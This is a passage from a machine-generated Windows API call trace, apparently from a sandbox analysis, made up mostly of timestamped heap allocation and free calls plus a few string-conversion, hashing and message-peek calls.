(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69790 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.453] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe) returned 0x2aa9c40 [0087.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9c40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.454] CryptHashData (hHash=0x9a3fc0, pbData=0x2a71868, dwDataLen=0x3, dwFlags=0x1) returned 1 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0087.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69790 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0087.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0087.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69760 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0087.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0087.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.457] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0087.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0087.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0087.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0087.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0087.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.458] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c70 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.458] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0087.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.459] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.459] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0087.459] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0087.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0087.460] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0087.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0087.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9d90 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.460] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.460] RtlAllocateHeap 